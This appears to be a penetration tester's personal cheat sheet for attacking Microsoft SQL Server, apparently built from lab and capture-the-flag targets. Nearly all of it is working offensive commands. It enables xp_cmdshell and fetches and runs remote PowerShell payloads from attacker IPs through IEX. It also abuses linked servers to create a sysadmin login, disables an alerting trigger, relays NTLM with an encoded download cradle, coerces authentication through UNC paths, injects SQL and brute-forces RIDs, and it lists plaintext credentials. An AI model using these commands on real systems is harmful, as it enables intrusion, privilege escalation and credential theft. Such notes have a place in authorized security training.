SQLServerLinkedServersPassowrds
-
SQLbrowser service running on the machine.
-
The user executing the script must also have sysadmin access to all the database instances (for the DAC connection) and local admin privileges on the Windows server (to access the entropy bytes in registry). In addition, if UAC is enabled, the script must be ran as an administrator. Below is a summary of the process used by the script.
https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/?tab=readme-ov-file
Upload all the four files and execute them.
./EnableTCPIP.ps1
./EnableDAC.ps1
./AddStartUPParameter.ps1
./DecryptLinkedServersPassowrds.ps1
Reverse shell with login creds
mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Enabling xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
Getting shell
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadString(''http://10.8.2.41/amsi64.txt'') | IEX"'
EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'Show Advanced Options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "iwr -Uri ''http://10.10.14.32/amsi64.txt'' -UseBasicParsing | iex"';
REVERT;
MSSQL injection
Sleep
artist=1';WAITFOR%20DELAY%20'0:0:10'--
MSSQL Liniked Servers
python3 mssqlclient.py webapp11:89543dfGDFGH4d@192.168.181.142
select srvname from master..sysservers
Should also try execute_as thing sa if the current user has access denined for following commands
select * from openquery("SQL27", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='SQL27'
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL27];
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [SQL27];
EXEC('EXEC xp_cmdshell ''echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.45.195:80/large1.ps1") | powershell -noprofile'';') AT [SQL27];
nc -lvnp 1234
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
Bounce back to original linked for getting sa
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG]EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
mssqlclient.py 'df:qwe123QWE!@#@10.13.38.11'
SELECT name FROM master..sysdatabases;
select table_name,table_schema from INFORMATION_SCHEMA.TABLES;
select * from flag.dbo.flag;
select name from sys.server_triggers;
disable trigger ALERT_xp_cmdshell on all server
enable_xp_cmdshell
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type \inetpub\wwwroot\web.config");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
SQLRecon
Uncpath injection
sqlrecon -- /e:sqlspns
$text ="(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:80/amsi64.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
sudo proxychains ntlmrelayx.py --no-http-server -smb2support -t 172.16.240.151 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEANQA5ADoAOAAwAC8AYQBtAHMAaQA2ADQALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'
sudo responder -I tun0
sqlrecon -- /a:wintoken /h:172.16.240.152 /m:smb /rhost:\\\\192.168.45.159\\\\Projects
MSSQL queries
select * from sys.dm_os_file_exists('\\10.8.2.41\Projects')
Enumerate users
manual way
SELECT DEFAULT_DOMAIN();
It will give you the domain name
SELECT SUSER_SID('REDELEGATE\Domain Admins')
Using the domin name and a group, we will obtaine domain sid
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.ValueUse the above powershell script to get the domain sid decoded.
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="***"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
doneEnumerate the base on RID.
Automated way
nxc mssql 10.10.91.240 -u SQLGuest -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute 2000
CVES
Authenticated
One significant security bulletin that addressed vulnerabilities in SQL Server 2008 R2, including SP1, is MS15-058. This bulletin described vulnerabilities that could allow remote code execution if an authenticated attacker ran a specially crafted query. The associated CVEs for this bulletin include:
CVE-2015-1761: Microsoft SQL Server Elevation of Privilege Vulnerability
CVE-2015-1762: Microsoft SQL Server Remote Code Execution Vulnerability
CVE-2015-1763: Microsoft SQL Server Elevation of Privilege Vulnerability
It is important to note that running SQL Server 2008 R2 SP1 without an ESU subscription leaves your system vulnerable to potential security threats, as newly discovered vulnerabilities will not be patched. Upgrading to a newer, supported version of SQL Server is highly recommended for improved security and access to the latest features.
1. CVE-2020-0618 - SQL Server Reporting Services RCE
Severity: Critical (CVSS 9.8)
Public Exploit: Yes (Metasploit module available)
Description: Remote code execution in SQL Server Reporting Services (SSRS)
# Metasploit
use exploit/windows/mssql/mssql_clr_payload
# or
use exploit/windows/http/ssrs_navcorrector_exec
-- See who you are
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT SUSER_NAME();
-- Check your permissions
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
-- See what roles you're in
SELECT USER_NAME(), * FROM sys.database_principals WHERE type = 'R';
EXEC sp_helprotect;